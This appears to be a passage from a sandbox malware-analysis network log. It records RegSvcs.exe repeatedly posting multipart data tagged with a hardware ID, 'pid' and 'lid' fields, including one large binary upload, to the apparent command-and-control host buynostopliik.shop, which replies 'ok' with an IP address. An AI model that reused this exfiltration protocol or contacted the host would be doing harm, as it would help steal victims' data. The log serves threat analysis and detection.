2025-01-14 16:59:26 UTC	15056	OUT	Data Raw: 2d 2d 30 34 48 51 56 47 5a 31 34 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 38 45 33 34 33 34 35 30 41 33 42 30 43 32 32 42 39 36 30 43 43 31 38 44 39 39 42 33 37 35 41 0d 0a 2d 2d 30 34 48 51 56 47 5a 31 34 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 30 34 48 51 56 47 5a 31 34 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4e 4e 61 57 43 4d 2d 2d 54 45 53 54 0d 0a 2d 2d 30 34 48 51 56 47 5a 31 34 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 Data Ascii: --04HQVGZ145Content-Disposition: form-data; name="hwid"C8E343450A3B0C22B960CC18D99B375A--04HQVGZ145Content-Disposition: form-data; name="pid"2--04HQVGZ145Content-Disposition: form-data; name="lid"NNaWCM--TEST--04HQVGZ145Content-D
2025-01-14 16:59:27 UTC	1138	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 16:59:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=mctbf78j54d09dfecgndv33449; expires=Sat, 10 May 2025 10:46:06 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y7K2js554mFY%2B3dzG%2F5WAshiwak%2FFk3MBI8D33sMXs7z7weLKpakjxktKYSRSfd5tGkP97pUlxwZP8R9cswO1klJWPSx%2FVRor%2Flc05WN5%2FYv5KSvYI8do%2BTfOwtCNR0B198Gl6s%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901f2d34ec178c0f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2058&min_rtt=2041&rtt_var=799&sent=9&recv=19&lost=0&retrans=0&sent_bytes=2844&recv_bytes=15990&delivery_rate=1340679&cwnd=223&unsent_bytes=0&cid=d921959c8e1bc380&ts=560&x=0"
2025-01-14 16:59:27 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-14 16:59:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49795	104.21.80.1	443	6480	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 16:59:27 UTC	279	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=9P7THML6AU80Q User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 19932 Host: buynostopliik.shop
2025-01-14 16:59:27 UTC	15331	OUT	Data Raw: 2d 2d 39 50 37 54 48 4d 4c 36 41 55 38 30 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 38 45 33 34 33 34 35 30 41 33 42 30 43 32 32 42 39 36 30 43 43 31 38 44 39 39 42 33 37 35 41 0d 0a 2d 2d 39 50 37 54 48 4d 4c 36 41 55 38 30 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 39 50 37 54 48 4d 4c 36 41 55 38 30 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4e 4e 61 57 43 4d 2d 2d 54 45 53 54 0d 0a 2d 2d 39 50 37 54 48 4d 4c 36 41 55 38 30 Data Ascii: --9P7THML6AU80QContent-Disposition: form-data; name="hwid"C8E343450A3B0C22B960CC18D99B375A--9P7THML6AU80QContent-Disposition: form-data; name="pid"3--9P7THML6AU80QContent-Disposition: form-data; name="lid"NNaWCM--TEST--9P7THML6AU80
2025-01-14 16:59:27 UTC	4601	OUT	Data Raw: 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de a8 de f8 f4 8d d8 f5 6f 86 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: +?2+?2+?o?Mp5p_oI
2025-01-14 16:59:28 UTC	1129	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 16:59:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=bd926tvlvsb3e4e9q0tsv973mf; expires=Sat, 10 May 2025 10:46:07 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rrdOlBsbXmb3OQBRtYTMaAhgxm3x%2FU7fby0xkDIcn1%2BxSEBY03v0mkRny0R7oSUNblB6zSShLpk1HZoFN5GeI9bCqN9cHzoOaZtloCJzcLXPvsjkz260a6ZhhYQX3SIu7KcwMD8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901f2d3c48040f36-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2078&min_rtt=1916&rtt_var=834&sent=10&recv=23&lost=0&retrans=0&sent_bytes=2844&recv_bytes=20891&delivery_rate=1524008&cwnd=231&unsent_bytes=0&cid=8e0b8239cba45335&ts=702&x=0"
2025-01-14 16:59:28 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-14 16:59:28 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49805	104.21.80.1	443	6480	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 16:59:29 UTC	283	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=2VJBCZMYZ1C3W8T88M User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1382 Host: buynostopliik.shop
2025-01-14 16:59:29 UTC	1382	OUT	Data Raw: 2d 2d 32 56 4a 42 43 5a 4d 59 5a 31 43 33 57 38 54 38 38 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 38 45 33 34 33 34 35 30 41 33 42 30 43 32 32 42 39 36 30 43 43 31 38 44 39 39 42 33 37 35 41 0d 0a 2d 2d 32 56 4a 42 43 5a 4d 59 5a 31 43 33 57 38 54 38 38 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 32 56 4a 42 43 5a 4d 59 5a 31 43 33 57 38 54 38 38 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4e 4e 61 57 43 4d 2d 2d 54 45 53 54 0d Data Ascii: --2VJBCZMYZ1C3W8T88MContent-Disposition: form-data; name="hwid"C8E343450A3B0C22B960CC18D99B375A--2VJBCZMYZ1C3W8T88MContent-Disposition: form-data; name="pid"1--2VJBCZMYZ1C3W8T88MContent-Disposition: form-data; name="lid"NNaWCM--TEST
2025-01-14 16:59:29 UTC	1130	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 16:59:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=h2obqka8kfcjqti0spm0mm8uqm; expires=Sat, 10 May 2025 10:46:08 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RtcPEhjcB8E7AXgiJYjc6SR001UD8OEGSosU1dtAG%2FO2Ir0tnES1L2AuUENPenaSHh4%2FVlZkICKFV5jQcwLeHEnt1bNo3vUZewZMEP5QJq3pw%2BAFaq7qtVxaqeLZ8sL%2FWYv4EOk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901f2d446a8dc443-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1511&min_rtt=1502&rtt_var=582&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=2301&delivery_rate=1849271&cwnd=244&unsent_bytes=0&cid=af644d295089695d&ts=506&x=0"
2025-01-14 16:59:29 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-14 16:59:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49815	104.21.80.1	443	6480	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 16:59:30 UTC	275	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=NMR2W5JO User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 570684 Host: buynostopliik.shop
2025-01-14 16:59:30 UTC	15331	OUT	Data Raw: 2d 2d 4e 4d 52 32 57 35 4a 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 38 45 33 34 33 34 35 30 41 33 42 30 43 32 32 42 39 36 30 43 43 31 38 44 39 39 42 33 37 35 41 0d 0a 2d 2d 4e 4d 52 32 57 35 4a 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4e 4d 52 32 57 35 4a 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4e 4e 61 57 43 4d 2d 2d 54 45 53 54 0d 0a 2d 2d 4e 4d 52 32 57 35 4a 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 Data Ascii: --NMR2W5JOContent-Disposition: form-data; name="hwid"C8E343450A3B0C22B960CC18D99B375A--NMR2W5JOContent-Disposition: form-data; name="pid"1--NMR2W5JOContent-Disposition: form-data; name="lid"NNaWCM--TEST--NMR2W5JOContent-Dispositi
2025-01-14 16:59:30 UTC	15331	OUT	Data Raw: ad 73 ff 2f 7b ff df 8b 2b 8a 99 6f 84 ce 93 45 04 24 f4 67 e7 c8 f4 21 70 02 2c 11 36 05 c4 ea 91 ec 8e db 72 92 30 1f ef cf ce 97 43 ad 2a ae 1f 35 fe 93 2b d1 68 5a e0 86 6d a0 d7 3b 69 90 34 9f dc 48 94 a1 26 49 fd ae 15 64 d1 20 cc b3 b5 dc 68 e8 6d 9f fa 98 80 cb b9 55 c8 3b ad 01 5e 1a 11 d6 e5 08 dd d3 7d 4c 71 5a 30 4b 75 c3 4c 69 f7 c2 93 b8 ce 92 1c 2c ac b7 64 91 5b b4 33 e1 e5 76 3a 6f 72 86 52 25 3b 5d a2 b8 7a 8f 15 9e 35 c7 0a 54 09 d9 35 53 be 1d a6 c2 c6 fc 40 6d c2 b1 d3 6a 1c 9a 3a c1 bc 85 5b 14 03 df 8a f0 2c f6 1d 21 ff 83 b1 6b b7 f4 11 1d d6 10 1e 92 a8 9e b8 d5 18 d0 8e db 7c 47 9c 7b 1f a7 89 8f 46 6d 15 0a 26 9c 62 62 c8 ce 1f 9e 25 5a 1c d7 bd b2 04 39 b6 5b d4 a4 06 d7 2c db f2 a3 38 19 a3 a4 bc d8 f9 3b 23 0a cd 77 59 66 13 Data Ascii: s/{+oE$g!p,6r0C*5+hZm;i4H&Id hmU;^}LqZ0KuLi,d[3v:orR%;]z5T5S@mj:[,!k\|G{Fm&bb%Z9[,8;#wYf
2025-01-14 16:59:30 UTC	15331	OUT	Data Raw: ef f4 14 24 a6 27 9d 9b 37 d3 e4 26 ba 1c de ed cd 81 c6 be 56 3a 39 b1 5f 17 58 c8 07 97 0d b5 82 1d 98 17 ce 96 cd 14 22 55 23 92 7b 6b 5a dd 89 93 cf 3a d2 6c 2c b5 70 7e 5c f1 b8 21 81 b0 fb 4e 35 39 96 b4 94 dc 1f e9 7d ff 07 23 4a 96 3f 21 12 32 50 43 29 e5 29 b7 3b fe d7 6d 72 34 cc 33 df 2f 34 dc c7 0e 4a 47 19 05 aa 07 9b 35 04 15 11 30 6c b1 ae c7 5f 56 94 13 22 6b 8c 10 5e e5 44 b8 55 6f 95 fe 3c 9a f3 a4 54 18 da 24 f0 76 b9 da 25 f2 11 86 15 6c 18 a1 01 51 eb 6f 9a ef 88 06 16 ab ae 36 07 d0 d1 bb 86 ca 54 e4 8a b6 e2 77 2a 86 c2 5e 63 8a 03 c1 d6 6f 03 a7 15 ac d6 5f 31 2c 7e 6d c4 da ec 46 ed 50 3d bb bd 91 e7 3f ea ec 9a 9b 18 5f 1a 79 67 fd 71 f9 fa 58 e2 c0 c9 43 03 3f 03 d7 df 32 3c d9 5f 9e fd 96 50 b7 1d 3c 00 2a 16 56 ed 4b 54 ae db Data Ascii: $'7&V:9_X"U#{kZ:l,p~\!N59}#J?!2PC));mr43/4JG50l_V"k^DUo<T$v%lQo6Tw^co_1,~mFP=?_ygqXC?2<_P<VKT
2025-01-14 16:59:30 UTC	15331	OUT	Data Raw: 08 67 54 5d cf c8 57 5f af cb 3e 59 e7 be cc 79 34 38 aa c5 7a a2 62 ff 81 6c 53 ff 55 a9 ef 4f d9 2f 8e 5d e8 95 8a 7e da d8 7d 1c ac f0 4d 94 b5 37 11 24 1e 01 d3 5a 18 69 15 90 32 35 b0 4a a2 ea ef 1c b4 59 24 8c 49 df b8 d1 41 d3 c2 24 ba 81 5e 02 11 03 2e 1f 57 fb 7e 08 93 af 75 5a 83 68 01 74 ce e2 7b 0f 00 e5 48 f8 75 03 c3 52 3e b3 92 7b 46 99 61 f6 81 84 88 16 6d 37 28 41 0b e4 bb 73 54 20 38 9e 40 b9 c4 3c 05 51 15 2e ac 67 23 33 66 f9 13 c1 44 19 74 f9 63 43 d5 e7 dd e4 a9 10 db d9 9b 47 90 ca c3 29 21 46 f9 b2 c1 16 f2 cf b7 26 a6 22 af 07 8a ad 0c 4a f8 eb cf 50 cb 9d 08 90 ca fc 3d 88 02 0c 19 75 77 b6 c8 a9 fa a8 37 05 7b 49 dd 7b 2d d4 72 34 b6 a7 e3 c8 f1 ac dc 2d 81 b7 5e c6 ad 5b f7 b8 0f 51 80 b1 28 dd 2a 0e d3 1f 04 fb 41 4d 03 61 84 Data Ascii: gT]W_>Yy48zblSUO/]~}M7$Zi25JY$IA$^.W~uZht{HuR>{Fam7(AsT 8@<Q.g#3fDtcCG)!F&"JP=uw7{I{-r4-^[Q(*AMa
2025-01-14 16:59:30 UTC	15331	OUT	Data Raw: 2d 7e 17 dd 89 84 7f 36 7e dc 6f 35 c3 5f e0 7a 89 8d 54 64 a9 b3 ad 1b 74 9d 87 36 1a f0 df 4d 27 6c 48 d4 2d 02 a4 2b 67 25 9f e1 cf 9e 58 73 ad 8f 16 37 d5 48 eb 69 16 22 36 05 98 7a 56 65 ed 16 88 f6 9e 6c ea 34 73 e4 d9 34 a1 b4 eb ad 2b 83 56 e1 90 f7 63 e3 98 12 52 52 a6 ba 00 10 62 5d 10 23 b9 6d 0f 1b 16 bc 59 b1 71 08 8f da 19 87 bb 40 ee 3b 20 0e e1 23 7a 1a c8 c1 53 6b 3d 12 11 9e f1 ef 5f e9 17 35 85 1e 10 ce 1a e7 4f f5 d1 2f 88 f9 b6 11 8e fb 76 f8 7e e8 cc 07 35 51 de 43 e2 ff ef b4 6b b0 09 a8 a1 18 10 a3 87 4a 85 c2 33 8e 83 cc 88 fa 8f 00 ae bf 00 ab b3 a4 ea 7e 4f 9c 3f 10 cb 30 32 72 29 9c 0a 82 e3 36 1d 53 a3 c3 47 32 36 5f 58 3f e2 e9 30 a3 7f 5f 11 43 c1 dd c3 d9 20 c9 8b ac 87 5a a9 36 83 4d d5 88 ee a9 6b b8 fd 99 01 d8 f4 77 46 Data Ascii: -~6~o5_zTdt6M'lH-+g%Xs7Hi"6zVel4s4+VcRRb]#mYq@; #zSk=_5O/v~5QCkJ3~O?02r)6SG26_X?0_C Z6MkwF
2025-01-14 16:59:30 UTC	15331	OUT	Data Raw: 80 8a 27 fe 2a 7f 41 b8 71 2d c9 13 dd b9 28 4c 26 61 69 b7 85 64 b5 5f f4 69 fc c6 d4 fb ca 69 1a 08 0b 55 21 81 05 fb cc ee 7e ed 96 c1 df 9d 19 1b e6 da 65 fb 3b 4d 6a f5 fb f3 c3 76 dc a1 1d ac 7f 5e ca 14 09 54 20 d1 7c 0f 07 38 b1 d5 bf b1 4c 5f 6a 33 57 73 94 cf 6e 8a 14 a1 1a 89 87 a8 c2 af 88 bd 7c b9 79 86 b5 a4 5a fd 8b f8 17 b3 d5 15 41 9a c6 2f e2 b1 69 0a 77 e0 0c 19 98 8f 33 9f fc 0d 38 24 4e 8f 18 55 fd c0 c6 8c f5 4e ec 97 c7 d4 57 36 f8 16 32 84 4e 57 1d 74 d8 64 ec 0b 6c 09 a0 1c 8b 7c 9f 2a 1e 55 5f 8d 96 8d 22 15 7c 71 b4 db 53 2b fd de ec 5e f0 93 41 54 d3 f3 f5 9a 95 b6 5c 61 cf f9 3c 43 d8 70 cf ef d9 c2 da d4 27 d4 ee 0f 84 a9 6f 85 22 ce 80 3c bd 4d 1b d1 b7 fd a0 1f ba b6 fa 43 54 61 a8 78 4f 7d e5 26 67 f3 50 21 d6 54 88 2c 2c Data Ascii: 'Aq-(L&aid_iiU!~e;Mjv^T \|8L_j3Wsn\|yZA/iw38$NUNW62NWtdl\|U_"\|qS+^AT\a<Cp'o"<MCTaxO}&gP!T,,
2025-01-14 16:59:30 UTC	15331	OUT	Data Raw: 64 24 08 f7 e6 1c 39 9b 48 fc f7 9b 90 c1 bf 0d 51 c2 9f d6 e9 df 3f 4f f4 33 b0 d7 4e 49 5f 51 b9 79 95 c8 77 2c e0 75 94 ca 7f 02 35 bd a7 0f 3a 94 07 97 5b 6f 3d 51 b0 98 d5 8d f2 8b 7b 1e a8 73 c4 fa c8 25 f7 ae 1f 25 67 ff a0 6a 9e 07 ec d8 38 13 3f 29 26 ed c1 a6 3c c7 85 9f cf 0f 7e 3b c0 2a b3 d1 ed e8 eb 7c 78 7d 30 a4 6e bc 38 b5 63 3f 39 d7 99 7b dd f2 ba 43 d7 d9 7c cd 82 b4 36 66 ef cf fc 73 1d 9d b1 b2 83 7b 2f 2c f5 2d ac bc 55 77 cc a1 fe d9 1f 76 5e cb 1c 44 3c 3e 07 f1 49 42 b5 15 be df bd 76 7c f0 64 9c 4f 77 de c3 97 9c d5 d0 95 3a 75 62 25 df 68 ff df f4 c1 44 da c0 c3 49 e7 db 35 39 7f 85 2d 74 45 75 35 48 5d 0a 5b 58 2f b9 81 42 85 b4 8e a5 e5 e4 36 8c a5 ae bc a5 ad da 58 b8 2e 18 fe 8c 4d cb 68 b8 d2 12 74 84 24 56 57 f3 95 fa 27 Data Ascii: d$9HQ?O3NI_Qyw,u5:[o=Q{s%%gj8?)&<~;*\|x}0n8c?9{C\|6fs{/,-Uwv^D<>IBv\|dOw:ub%hDI59-tEu5H][X/B6X.Mht$VW'
2025-01-14 16:59:30 UTC	15331	OUT	Data Raw: 0a dc 78 4c 26 d3 b7 9c d7 5c 73 a9 a7 52 db 9b 98 99 5b 7e f5 48 74 71 ab 7e bb d0 79 17 5b f7 51 f0 72 3e 95 4a 9a 0c c0 3f 91 87 db e7 3c 45 9b 03 cf 0c af c6 30 8e e1 5b 16 44 0d f8 d7 bf f7 20 77 83 99 05 e5 16 ba 20 26 25 a9 de 60 51 3b 1e d6 c4 78 4e 49 e7 b0 df 31 95 51 e6 58 e6 76 6c 67 b7 b6 1b 0c 47 84 3f d1 6d 37 e2 4b 70 3f ed f4 a6 f3 d5 c0 0e 84 6b 3f 42 db b3 5d 9b b3 db 44 1e 91 a6 bf 9e 15 95 db 88 c3 a3 04 57 f0 c0 cf 1c cf f6 39 e0 3c 54 3e cf 21 8f bc 2f 65 13 20 07 12 fb 6e 34 75 b9 34 60 17 cd e1 5e 42 e5 2f 89 f7 62 33 2f da 2d eb cf 10 64 2e 06 20 93 eb 16 c6 21 51 32 ef 2c 8b 3b 05 dd d8 78 36 92 4c a4 c8 6d 38 96 e4 cd 7b 08 f1 4f 24 d5 ed c7 e7 cf 7b b6 89 ca 2b 81 84 d5 d9 fe 66 dd b4 a6 9e 4b 40 4f c9 4c 27 fd 82 fe eb 7d fa Data Ascii: xL&\sR[~Htq~y[Qr>J?<E0[D w &%`Q;xNI1QXvlgG?m7Kp?k?B]DW9<T>!/e n4u4`^B/b3/-d. !Q2,;x6Lm8{O${+fK@OL'}
2025-01-14 16:59:30 UTC	15331	OUT	Data Raw: de 03 55 c7 59 ff 30 10 e5 b9 d9 7d 3e ce 80 31 28 9f c8 de c1 1d 09 26 11 c4 57 1d 93 43 f7 24 8c 31 8a 01 62 d1 26 05 4e 1a 24 04 5a c1 ca 30 eb 1e 6f 4c c6 6c fd b6 c5 77 7d 83 8d ab ed 36 e3 a9 e2 39 9c d6 87 8a ff f6 85 cf 6a 97 f1 c4 79 6a 73 31 72 29 d3 2c 4c 6c c6 80 4d 0e dd 33 67 26 b7 1f 4d 22 6d a4 2d 21 bf a1 45 7e 19 56 86 64 9f c9 84 e1 34 ac cc 28 34 ba d7 0c b1 56 93 da 42 e6 12 cb 8f ff 89 0e 23 60 85 e2 94 42 a1 84 0a 81 66 bd 21 93 8a 0f 32 da 56 f6 b8 6e 9b 2e c5 61 c5 6c 68 45 13 ec 30 e9 28 c0 c6 ec bb a8 59 ca 0b 08 22 67 46 05 dd 25 8f b0 5e 30 ac 38 d9 46 9b 12 5b ab 37 67 28 26 5b c0 dc c0 d8 bf 0e a7 02 1e 7d 11 65 88 22 54 d4 82 74 0b da 46 40 71 f7 7d 3b dc d2 7c 10 45 45 e8 03 b6 63 4f 09 f6 5a c6 6c 7c 0f 93 94 ad 2c 75 9d Data Ascii: UY0}>1(&WC$1b&N$Z0oLlw}69jyjs1r),LlM3g&M"m-!E~Vd4(4VB#`Bf!2Vn.alhE0(Y"gF%^08F[7g(&[}e"TtF@q};\|EEcOZl\|,u
2025-01-14 16:59:30 UTC	15331	OUT	Data Raw: 0a 7b 60 42 4a a0 c6 af ef 21 c1 6f f7 67 36 51 24 da 66 4a cb 6b e4 8a d6 58 78 e1 c8 15 4e 98 62 32 91 ea 0d a0 41 63 2a 5b 8d 88 c0 eb ef c4 9d 2d 42 6e 7e f4 6f a6 ee e1 03 ca 7f 67 7d 73 78 b9 f9 43 34 72 6a 34 0e fb f1 00 db e3 11 ca c8 af f8 fc ee a8 3d 6a ba 70 b9 7d 49 ff 31 57 92 5a 60 4a 08 72 8e 24 e5 a0 1b be e5 20 43 d1 07 88 70 1b c9 c2 25 f1 b4 0f 20 a2 6f 8e 50 06 d3 c1 60 5b 15 10 37 38 40 a1 41 49 4a 2b 6b 3f f8 ab 4f 7d ad bd 85 de 54 a0 52 2f 01 b5 13 11 ab fe 23 d8 dd 75 2c d6 da 0f 5c 01 68 14 de 15 c0 91 ee 48 ed 71 d0 79 18 7b 22 b8 4b 5c ec 4d d5 b6 12 3b 36 e8 22 0a ff 22 46 07 08 22 11 36 6a 59 40 ed 08 af b3 6a f4 dd 18 d6 63 c9 4d 9b c8 b0 92 7d 22 d9 7c 35 1f 01 ef c8 51 fd 37 67 39 0f e3 e1 5b 7b 8d 74 b8 de 34 78 1d 90 7e Data Ascii: {`BJ!og6Q$fJkXxNb2Ac*[-Bn~og}sxC4rj4=jp}I1WZ`Jr$ Cp% oP`[78@AIJ+k?O}TR/#u,\hHqy{"K\M;6""F"6jY@jcM}"\|5Q7g9[{t4x~
2025-01-14 16:59:33 UTC	1143	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 16:59:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=5m9g8i2t85kj1eqqv8dpa2kmj2; expires=Sat, 10 May 2025 10:46:10 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5sx7uL7UAmGJZnhAhFsOAqNBQ%2Bf6WoX%2F5n6mP68o5%2FzaTJSSuJWEd4fbabeeTLIJ4bkmz3W4m0j3z%2F5a5Lx9E5llxMg5reyvuzDoJ3g%2BFzJpP92TkL%2FlBwemmHg%2BvPm0eydIdmU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901f2d4c5c52c443-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1681&min_rtt=1564&rtt_var=670&sent=274&recv=590&lost=0&retrans=0&sent_bytes=2845&recv_bytes=573223&delivery_rate=1867007&cwnd=244&unsent_bytes=0&cid=e2d6e4bce361661d&ts=3146&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49834	104.21.80.1	443	6480	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
